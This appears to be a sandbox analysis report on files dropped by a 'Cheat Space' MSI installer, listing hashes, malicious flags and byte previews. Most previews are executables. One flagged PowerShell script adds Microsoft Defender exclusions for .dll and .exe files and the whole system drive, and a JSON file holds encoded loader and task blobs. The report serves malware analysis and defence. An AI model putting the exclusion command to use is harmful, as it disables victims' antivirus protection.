Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3vtuwuv1.hor.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hivfenwh.hw0.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nrvdbafc.yjq.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_quy1b1yr.3yr.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rw4z3ibl.1ds.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\pss1BB4.ps1

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	5784
Entropy (8bit):	3.4920621874565785
Encrypted:	false
SSDEEP:	96:5wb5jTmmywV2BVrIovmkiGjxcj6BngOcvjb:5wbdTif/njVyvb
MD5:	FC1BB6C87FD1F08B534E52546561C53C
SHA1:	DB402C5C1025CF8D3E79DF7B868FD186243AA9D1
SHA-256:	A04750ED5F05B82B90F6B8EA3748BA246AF969757A5A4B74A0E25B186ADD520B
SHA-512:	5495F4AC3C8F42394A82540449526BB8DDD91ADF0A1A852A9E1F2D32A63858B966648B4099D9947D8AC68EE43824DACDA24C337C5B97733905E36C4921280E86
Malicious:	true
Preview:	..p.a.r.a.m.(..... . .[.a.l.i.a.s.(.".p.r.o.p.F.i.l.e.".).]. . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.O.u.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".p.r.o.p.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.K.V.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.F.i.l.e.".).]. . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.A.r.g.s.F.i.l.e.".).].[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.f.a.l.s.e.).].[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.A.r.g.s.F.i.l.e.P.a.t.h..... .,.[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. . . . . . . . . . . . . . . . . . . . . . . . . . .[.s.t.r.i.n.g.]. .$.t.e.s.t.P.r.e.f.i.x..... .,.[.s.w.i.t.c.h.]. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\AppData\Local\Temp\scr1BA2.ps1

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	314
Entropy (8bit):	3.531059483338694
Encrypted:	false
SSDEEP:	6:QJilMcRIW02qGNlGtulZ/x56FpwkDjkRH37cnl5WY:QJGHRIWT3GtqZ/epdjkh37kkY
MD5:	B5198ECF4840F4D33FCE4151FCA68704
SHA1:	70052B0C6E1016FEAEF3B2A42074D757BD1E3A4D
SHA-256:	B37BB17AED430C0E33B3B1713F99A30B04D01E8B49A2B664D8AFB135F312218E
SHA-512:	79B7DA8DB13E293A5A9DF3D7FF9F7091070C0125EC1424A6E5DC553D82E21B052CAD31F7AA3A034246CA16BC7642682D84E10B25628E1982FA22D004A23EC9FF
Malicious:	true
Preview:	..P.a.r.a.m.(.).........$.c.o.m.m.a.n.d. .=. .".&. .{. .&. .'.A.d.d.-.M.p.P.r.e.f.e.r.e.n.c.e.'. .-.E.x.c.l.u.s.i.o.n.E.x.t.e.n.s.i.o.n. .'...d.l.l.'.,. .'...e.x.e.'. .-.E.x.c.l.u.s.i.o.n.P.a.t.h. .$.e.n.v.:.S.y.s.t.e.m.D.r.i.v.e. .-.F.o.r.c.e. .}.".........p.o.w.e.r.s.h.e.l.l. .-.C.o.m.m.a.n.d. .$.c.o.m.m.a.n.d.

C:\Users\user\AppData\Roaming\Python\pip.exe

Download File

Process:	C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1078604841
Entropy (8bit):	0.06731607667802332
Encrypted:	false
SSDEEP:
MD5:	DBB81DE552128E12E235F82766A5309A
SHA1:	772D98C755B4CC161804D00DA3B0722DB7B082FA
SHA-256:	7C990686B10335C4447F5A5C19A1973683B920C12A85C9950EDF9677D4BB98F2
SHA-512:	4478A3C3952EB9B23004910A9111AC0C980ED9650D60CD2B598AA44B01E3DCE1537CFA415D8E86608838E99EE97D45668D2575C139D2733A1174BF62D332E3E3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Op....................H..z......>.H.. ....H...@.. ........................J...........@..................................H.K.....H..p............J.((...`J.......H.............................................. ............... ..H............text...D.H.. ....H................. ..`.sdata........H.......H.............@....rsrc....p....H..r....H.............@..@.reloc.......`J.......J.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\9E146BE9C76A4720BCDB53011B87BD06

Download File

Process:	C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1988
Entropy (8bit):	3.9757122719300355
Encrypted:	false
SSDEEP:	48:YttajQAs9+0gJX1FsKQUV4zxVCgVXLwcqJL+g1o:styQAskyA6EgVbwNJL+g+
MD5:	AF7D4B34E367F443240AE6AB4C934229
SHA1:	FF52FD99CB018CB6396AAC48E3F0D3BEF9E0FB20
SHA-256:	A67052340D467E07BE40F359AC23F714B3A7FCCE8EC28216E20D03F0C28F578A
SHA-512:	B296A198C765A0DE963BE4CD61091985D928224A84BA01813AD8EB30590228815C04C53340946146A6C99A2BA7A621020896A226FBE042CB0C89016390BE7882
Malicious:	false
Preview:	{"loader":"YjMsNWIsZDIsYmMsYmYsOTIsYzEsZGYsYWIsYjYsZDAsYmEsYmYsZDUsYzYsOWQsYjYsOTYsOTQsOGQsN2IsYTMsNjMsNTYsOTMsYjYsYzUsZDIsYzcsZGEsYzYsNjgsNzIsNTksYTEsNmYsNmYsNTMsYzAsZDEsYjgsYjMsZTAsYzIsYmQsY2YsODQsNzIsNjQsZWYsN2MsZTEsYjQsZTQsYTgsNTYsNmMsNjEsN2UsOTQsODEsODUsN2EsYjksYWMsOWEsZTQsYjgsYzIsNTMsODgsOGMsYjIsYjMsZDcsYzcsYmYsZTQsOGUsNTgsNjYsZTgsYmIsY2YsYjcsZGMsYjcsNTYsNmMsNjEsY2MsODUsYzksY2EsZDAsYmEsNWEsNzMsOTAsNjUsOTAsOWYsNmUsZDEsYmUsYzQsZGEsYzYsN2EsZDYsYzUsOWIsYjksZTYsY2MsZDIsYWYsOTksNmYsNTQsNTQsYjQsYzUsYzQsYzksZGEsY2IsNjgsNzIsNTksZDYsYTQsYmIsYTQsYjMsZTksNzgsNzIsOGQsYmMsYzMsY2IsYzcsNWEsN2UsOTQsOGEsOTksNmIsOTksYjMsOTksYTQsYjQsYmEsZDYsYzksY2EsYzYsYTksOWQsNWIsYWEsNjMsODAsYWUs","tasks":"OTMsYjQsOTIsYWMsYjMsNTMsODgsOGMsODMsOGIsOWUsODAsN2EsODksY2UsYTEsYjIsZGYsN2MsYTcsNmIsOTksYWIsYTgsYTYsYjEsYzQsOWQsODQsOTQsYmIsYWEsYTYsNjcsZDQsYWMsYzIsOTQsYmQsZGUsYjAsYjMsZGIsYzQsODgsY2EsZDEsYTUsNzMsZDUsY2UsZTEsYWMsZGEsYWIsYTEsOTcsYWYsYzUsZDYsODQsOTYsODksN2QsNzEsNzAsYTQsN2MsODAsNjcsODAsOWYsODMsODgsOWYsOGQsOTMsOTksOT

C:\Windows\Installer\5d1856.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {02E7296D-0944-4B11-A980-B679F95292AD}, Number of Words: 2, Subject: Cheat Space, Author: Cheat Space Inc., Name of Creating Application: Cheat Space, Template: ;1033, Comments: This installer database contains the logic and data required to install Cheat Space., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Category:	dropped
Size (bytes):	3080192
Entropy (8bit):	6.95145463870732
Encrypted:	false
SSDEEP:	49152:Lku4o4DZKumZrzq4Fb6HXr1iWnYs4ntHurpllQ6aWuxtZmTreUuyZD6lvVz9FDVz:r4VKLFnWnjuxeTgvV5l
MD5:	90598D1C212BC35849C863413566ACD6
SHA1:	2249426C2283E4AFD949B87849B8E24AFD7A69D8
SHA-256:	3FB30F154339640D180D3486573EB8133C0A61556ADC6AA918C26A4E200DC90D
SHA-512:	ED8C10803E5CE1AACC028DAF5CE484A90A49B9C286E2FFE746E9C28DCE6E806B4276807469A8DBBAA02933AC84623AC298F5EF9CB44FAFE56196CF0470CD8DF1
Malicious:	false
Preview:	......................>.................../...................................l.......q.......9...:...;...<...=...>...?.......................................................................5...6...7...8...9...:...;...<...=.......y...................................................................................................................................................................................................................................................................................................d...........#...0............................................................................................... ...!...".../...$.......&...'...(...)...*...+...,...-.......6...1...B...2...3...4...5...8...7...?...9...:...;...<...=...>...H...@...A...c...C...D...E...F...G...........J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b.......e.......f...g...h...i...j...k...%.......n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Windows\Installer\MSI19CD.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	true
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI1A6A.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	true
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI1A9A.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	true
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI1ABA.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	true
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI1B09.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	191968
Entropy (8bit):	6.4059654303545885
Encrypted:	false
SSDEEP:	3072:TM6KwXYKcWHBnqA2L6vFW90Y+y3jS6LhrZe6benANHPPDZ1D5GvEOiF:TBKwXYBWHRuEFW9RzLLhrUmdHDZ19Mh0
MD5:	F11E8EC00DFD2D1344D8A222E65FEA09
SHA1:	235ED90CC729C50EB6B8A36EBCD2CF044A2D8B20
SHA-256:	775037D6D7DE214796F2F5850440257AE7F04952B73538DA2B55DB45F3B26E93
SHA-512:	6163DD8FD18B4520D7FDA0986A80F2E424FE55F5D65D67F5A3519A366E53049F902A08164EA5669476100B71BB2F0C085327B7C362174CB7A051D268F10872D3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A..QA..QA..Q...PK..Q...P..Q...PP..Q...PR..Q...PW..Q...Pu..Q...P@..Q...PP..QA..Q...Q...PY..Q...P@..Q...Q@..QA..Q@..Q...P@..QRichA..Q................PE..L....;.a.........."!................'........ ......................................O.....@.................................X...x.......x...........................ty..p....................z.......$..@............ .........@....................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI1B39.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	385797
Entropy (8bit):	6.410706028794072
Encrypted:	false
SSDEEP:	6144:JBKwXYBWHRuEFW9RzLLhrUmdHDZ19MhEBKwXYBWHRuEFW9RzLLhrUmdHDZ19Mhq8:OaHRuEs3Xmm9DZEXaHRuEs3Xmm9DZEv
MD5:	9063F1F0B78187802023F57542CE2294
SHA1:	B90D16144E66B6E7F6C63E0065FF4F96CAED9C4B
SHA-256:	ADC9A1B088FF75DC602188322C42957E05BD896EF54C4FC3F2E439B4D7D3E32B
SHA-512:	D092931D5ED6753FEC376366ABB2AEEB442DBAF05F6934676C27675EE70D93BCB6F5A1933FC445EB35A136C88C299E14B6BD36D4B25556E4A8A0932208D5887E
Malicious:	false
Preview:	...@IXOS.@.....@..W.@.....@.....@.....@.....@.....@......&.{1B68EDF1-D2C9-4B35-8A12-CF71B48BAA92}..Cheat Space..BpOyVCAP8g.msi.@.....@.....@.....@........&.{02E7296D-0944-4B11-A980-B679F95292AD}.....@.....@.....@.....@.......@.....@.....@.......@......Cheat Space......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........AI_RollbackTasks21.Rolling back scheduled task on the local computer..Task Name: [1]J...AI_RollbackTasks2.@.-........MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A..QA..QA..Q...PK..Q...P..Q...PP..Q...PR..Q...PW..Q...Pu..Q...P@..Q...PP..QA..Q...Q...PY..Q...P@..Q...Q@..QA..Q@..Q...P@..QRichA..Q................PE..L....;.a.........."!................'........ ......................................O.....@.................................X...x.......x...........................ty..p....................z.......$..@............ .........@.

C:\Windows\Installer\MSI1B98.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	588768
Entropy (8bit):	6.567039334307586
Encrypted:	false
SSDEEP:	12288:LBX/lKyuDvn4SsWPbV5BPsahK7RcekeUuyZD6WGvzQ5VEPL2Ra3D:x12h2SekeUuyZD6lvs0zqa3
MD5:	7B7D9E2C9B8236E7155F2F97254CB40E
SHA1:	99621FC9D14511428D62D91C31865FB2C4625663
SHA-256:	DF58FABA241328B9645DCB5DEC387EC5EDD56E2D878384A4783F2C0A66F85897
SHA-512:	FBAA1560F03255F73BE3E846959E4B7CBB1C24165D014ED01245639ADD6CC463975E5558567AB5704E18C9078A8A071C9E38DC1E499BA6E3DC507D4275B4A228
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...Z.J.Z.J.Z.Jj(.K.Z.Jj(.K.Z.Jj(.K.Z.J./.K.Z.J./.K.Z.J.. J.Z.J./.K.Z.Jj(.K.Z.J.Z.J.[.J./.K.Z.J./.K.Z.J./"J.Z.J.ZJJ.Z.J./.K.Z.JRich.Z.J................PE..L....<.a.........."!.........Z............................................... .......Q....@......................... o.......o...................................T......p...................@.......h...@...............L............................text...h........................... ..`.rdata..L...........................@..@.data................j..............@....rsrc...............................@..@.reloc...T.......V..................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI304A.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	191968
Entropy (8bit):	6.4059654303545885
Encrypted:	false
SSDEEP:	3072:TM6KwXYKcWHBnqA2L6vFW90Y+y3jS6LhrZe6benANHPPDZ1D5GvEOiF:TBKwXYBWHRuEFW9RzLLhrUmdHDZ19Mh0
MD5:	F11E8EC00DFD2D1344D8A222E65FEA09
SHA1:	235ED90CC729C50EB6B8A36EBCD2CF044A2D8B20
SHA-256:	775037D6D7DE214796F2F5850440257AE7F04952B73538DA2B55DB45F3B26E93
SHA-512:	6163DD8FD18B4520D7FDA0986A80F2E424FE55F5D65D67F5A3519A366E53049F902A08164EA5669476100B71BB2F0C085327B7C362174CB7A051D268F10872D3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A..QA..QA..Q...PK..Q...P..Q...PP..Q...PR..Q...PW..Q...Pu..Q...P@..Q...PP..QA..Q...Q...PY..Q...P@..Q...Q@..QA..Q@..Q...P@..QRichA..Q................PE..L....;.a.........."!................'........ ......................................O.....@.................................X...x.......x...........................ty..p....................z.......$..@............ .........@....................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI31D1.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	true
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\SourceHash{1B68EDF1-D2C9-4B35-8A12-CF71B48BAA92}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.1645521245830668
Encrypted:	false
SSDEEP:	12:JSbX72FjXiAGiLIlHVRpZh/7777777777777777777777777vDHFjKTLmfYit/lN:JIQI5teidiF
MD5:	FE4ECEFEC337C468FC234390EEAC769C
SHA1:	E40F49F388C72D4243C68A7540A1B623301DDE9D
SHA-256:	988902D2BE7D0E0537B6CD4FF479E6A63F68456AF04DD5FD21A537432BCC6E1C
SHA-512:	9E14C05FCC64E53899FBB6F84193912D104A02F1CC77170E298FF0B1852D8EF3B57460F12EFAA7557775B9ADD9CC40B7020965FE8862D7265534BE0B91812E8C
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.608091976599153
Encrypted:	false
SSDEEP:	48:yi8PhZuRc06WXJ0FT5xM7s6k3dK5SkdKAVAEkrCyEo4oxMmdKMSkdKcT7z:yNhZ13FTqs6RpeRCwN
MD5:	7E58E3FAE262BFF139543549F7F60469
SHA1:	A76BE4D11E40BA7E7B20A900F1A83DE5CE64155E
SHA-256:	66ED3422B6ACDD84C41A90A02794BB18ED22070E17014EFDCE97D3B4E50197DC
SHA-512:	762E04531FAE5D7DF08CC6B480AC99885E4321E2E4150D30051E89434396D59034E05ED5C54CA3B35F8F278AEE01F0E466F13154A704401CE864A1BCFA0576BF
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Download File

Process:	C:\Windows\System32\msiexec.exe
